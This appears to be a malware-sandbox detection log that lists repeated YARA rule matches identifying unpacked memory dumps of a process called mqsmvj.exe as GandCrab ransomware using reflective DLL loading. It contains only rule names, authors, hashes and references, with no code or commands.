Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 16.3.mqsmvj.exe.3b50000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 23.3.mqsmvj.exe.3a70000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 15.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 30.3.mqsmvj.exe.3470000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 16.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 3.3.mqsmvj.exe.3790000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 25.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 12.3.mqsmvj.exe.2fb0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 15.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 35.3.mqsmvj.exe.3970000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 25.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 30.3.mqsmvj.exe.3470000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 35.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 34.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 36.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, nodeepdive = , score = 2017-07-17, reference = Internal Research, modified = 2021-03-15
Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/
Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab author = kevoreilly, description = Gandcrab Payload, cape_type = Gandcrab Payload
Source: 37.3.mqsmvj.exe.3bc0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab tc_detection_name = GandCrab, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
